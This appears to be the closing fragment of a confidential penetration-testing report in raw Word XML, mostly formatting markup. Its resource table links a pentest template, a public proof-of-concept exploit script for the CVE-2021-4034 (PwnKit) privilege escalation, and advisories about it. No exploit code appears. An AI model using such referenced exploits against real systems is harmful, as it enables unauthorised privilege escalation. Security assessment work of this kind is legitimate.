          <w:p w14:paraId="647A40A5" w14:textId="5E8E5ABB" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Resource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="410EEDEE" w14:textId="567579A6" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022617B" w:rsidRPr="0022617B" w14:paraId="5AF00880" w14:textId="77777777" w:rsidTr="003B2C88">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D09D8C0" w14:textId="5DBC6860" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Pentesting Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DCCF56D" w14:textId="39519095" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>https://ccso.psu.edu/penetration-testing-resources/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022617B" w:rsidRPr="0022617B" w14:paraId="1122B1B7" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="2681"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4582EF4A" w14:textId="16CAB77B" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CVE 2021-4034</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="764E7DF6" w14:textId="4FB62830" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId37" w:history="1">
              <w:r w:rsidRPr="00094C19">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6EA56531" w14:textId="5D18B2A9" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidRPr="00094C19">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-4034</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4B22CD16" w14:textId="2C4BD49C" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022617B" w:rsidRPr="0022617B" w14:paraId="5C9EB0EE" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="1835"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B088275" w14:textId="5C1653D4" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="003B2C88">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Security Mitigation Resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1081BF90" w14:textId="321171E0" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>https://portswigger.net/web-security/all-topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B779A66" w14:textId="77777777" w:rsidR="005111E1" w:rsidRDefault="005111E1" w:rsidP="0022617B"/>
    <w:sectPr w:rsidR="005111E1">
      <w:headerReference w:type="default" r:id="rId39"/>
      <w:footerReference w:type="default" r:id="rId40"/>
      <w:headerReference w:type="first" r:id="rId41"/>
      <w:footerReference w:type="first" r:id="rId42"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="431"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88B8C" w14:textId="77777777" w:rsidR="00487ECE" w:rsidRDefault="00487ECE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="66F277B9" w14:textId="77777777" w:rsidR="00487ECE" w:rsidRDefault="00487E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Proxima Nova">
    <w:altName w:val="Tahoma"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>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B81A2" w14:textId="77B0ABBE" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="8280"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:t>NBN Corp CONFIDENTIAL</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="153" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6F8F4067" wp14:editId="65A6AE7F">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1390650</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>422910</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="8515350" cy="320675"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="18" name="Rectangle 2"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="8515440" cy="320760"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln w="0">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="60B9639B" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
                          <w:pPr>
                            <w:pStyle w:val="FrameContents"/>
                            <w:spacing w:line="240" w:lineRule="auto"/>
                          </w:pPr>
                          <w:r>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:t>24</w:t>
                          </w:r>
                          <w:r>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr tIns="91440" bIns="91440" anchor="ctr">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect w14:anchorId="6F8F4067" id="Rectangle 2" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:-109.5pt;margin-top:33.3pt;width:670.5pt;height:25.25pt;z-index:-503316327;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" o:allowincell="f" fillcolor="#009ddc" stroked="f" strokeweight="0">
              <v:textbox inset=",7.2pt,,7.2pt">
                <w:txbxContent>
                  <w:p w14:paraId="60B9639B" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                    </w:pPr>
                    <w:r>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:instrText xml:space="preserve"> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:t>24</w:t>
                    </w:r>
                    <w:r>
                      <w:fldChar w:fldCharType="end"/>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6E7E3" w14:textId="2EF7E094" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Sensitive</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">: The information in this document is strictly confidential and is intended for </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>NBN Corp</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="3D1AA8A3" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>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FF630" w14:textId="77777777" w:rsidR="00487ECE" w:rsidRDefault="00487ECE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50AE31EE" w14:textId="77777777" w:rsidR="00487ECE" w:rsidRDefault="00487E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4D46C" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="61" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6A4981B7" wp14:editId="21023C7F">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>152400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="952500" cy="59055"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="16" name="Rectangle 3"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="952560" cy="59040"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln w="0">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="46811A60" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
                          <w:pPr>
                            <w:pStyle w:val="FrameContents"/>
                            <w:spacing w:line="240" w:lineRule="auto"/>
                          </w:pPr>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr tIns="-31680" bIns="-31680" anchor="ctr">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect w14:anchorId="6A4981B7" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:12pt;width:75pt;height:4.65pt;z-index:-503316419;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" o:allowincell="f" fillcolor="#009ddc" stroked="f" strokeweight="0">
              <v:textbox inset=",-.88mm,,-.88mm">
                <w:txbxContent>
                  <w:p w14:paraId="46811A60" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                    </w:pPr>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="635" distL="0" distR="0" simplePos="0" relativeHeight="107" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="6DD7A701" wp14:editId="052ECD86">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1390650</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-457200</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="8515350" cy="74295"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="17" name="Rectangle 1"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="8515440" cy="74160"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln w="0">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="0E372EAB" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
                          <w:pPr>
                            <w:pStyle w:val="FrameContents"/>
                            <w:spacing w:line="240" w:lineRule="auto"/>
                          </w:pPr>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr tIns="-16560" bIns="-16560" anchor="ctr">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect w14:anchorId="6DD7A701" id="Rectangle 1" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:-109.5pt;margin-top:-36pt;width:670.5pt;height:5.85pt;z-index:-503316373;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;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" o:allowincell="f" fillcolor="#009ddc" stroked="f" strokeweight="0">
              <v:textbox inset=",-.46mm,,-.46mm">
                <w:txbxContent>
                  <w:p w14:paraId="0E372EAB" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                    </w:pP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7BD0" w14:textId="054B0B92" w:rsidR="0025451F" w:rsidRDefault="0025451F" w:rsidP="00ED489E">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="635" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="39A1471A" wp14:editId="2B079730">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1057275</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-453390</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="8515350" cy="74295"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="476857663" name="Rectangle 1"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="8515350" cy="74295"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln w="0">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="4288C61F" w14:textId="77777777" w:rsidR="0025451F" w:rsidRDefault="0025451F" w:rsidP="0025451F">
                          <w:pPr>
                            <w:pStyle w:val="FrameContents"/>
                            <w:spacing w:line="240" w:lineRule="auto"/>
                          </w:pPr>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr tIns="-16560" bIns="-16560" anchor="ctr">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect w14:anchorId="39A1471A" id="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:-83.25pt;margin-top:-35.7pt;width:670.5pt;height:5.85pt;z-index:-251656192;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;mso-wrap-distance-bottom:.0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" o:allowincell="f" fillcolor="#009ddc" stroked="f" strokeweight="0">
              <v:textbox inset=",-.46mm,,-.46mm">
                <w:txbxContent>
                  <w:p w14:paraId="4288C61F" w14:textId="77777777" w:rsidR="0025451F" w:rsidRDefault="0025451F" w:rsidP="0025451F">
                    <w:pPr>
                      <w:pStyle w:val="FrameContents"/>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                    </w:pPr>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00ED489E">
      <w:t>NetArmor Pentesters Security Assessment</w:t>
    </w:r>
  </w:p>
</w:hdr>
</file>

<file path=word/intelligence2.xml><?xml version="1.0" encoding="utf-8"?>
<int2:intelligence xmlns:int2="http://schemas.microsoft.com/office/intelligence/2020/intelligence" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst">
  <int2:observations>
    <int2:bookmark int2:bookmarkName="_Int_0dVHn8Km" int2:invalidationBookmarkName="" int2:hashCode="Jzb6spHwTmm2LU" int2:id="nIdBxpJ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29FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AC400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4666C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0780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55CD8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="387A22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B1A7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1540AFF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F20C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="093A699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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="23DA20A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AC400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3B1995"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E32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95410A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B58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77F7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79BE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1D75B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D18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644194"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1184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A279A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02442C4C"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60C95721"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="871A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82424"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D18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F60853"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30B28AD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D87170B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B58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174FA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D18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6C0EBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9AC400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B40037"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B344B2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42306475">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1472209987">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1862627030">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="127600525">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1133908793">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1071924804">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1938712969">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="997153141">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="650061401">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="263073022">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="501893777">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1604066610">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="178857564">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1413427879">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="213347894">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="160892055">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="459803556">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="815949686">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="604921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DD3"/>
    <w:rsid w:val="00017595"/>
    <w:rsid w:val="00071B65"/>
    <w:rsid w:val="000A151E"/>
    <w:rsid w:val="000C13F1"/>
    <w:rsid w:val="000F2981"/>
    <w:rsid w:val="0017115B"/>
    <w:rsid w:val="001E2E12"/>
    <w:rsid w:val="001F74D3"/>
    <w:rsid w:val="00201CBD"/>
    <w:rsid w:val="00220DD3"/>
    <w:rsid w:val="0022617B"/>
    <w:rsid w:val="0025451F"/>
    <w:rsid w:val="002726EA"/>
    <w:rsid w:val="002916F9"/>
    <w:rsid w:val="00291C36"/>
    <w:rsid w:val="00294FAB"/>
    <w:rsid w:val="00301B8C"/>
    <w:rsid w:val="0031119F"/>
    <w:rsid w:val="003C1B9C"/>
    <w:rsid w:val="00487ECE"/>
    <w:rsid w:val="004B3047"/>
    <w:rsid w:val="005111E1"/>
    <w:rsid w:val="00534794"/>
    <w:rsid w:val="00577A63"/>
    <w:rsid w:val="005D382D"/>
    <w:rsid w:val="005E10E3"/>
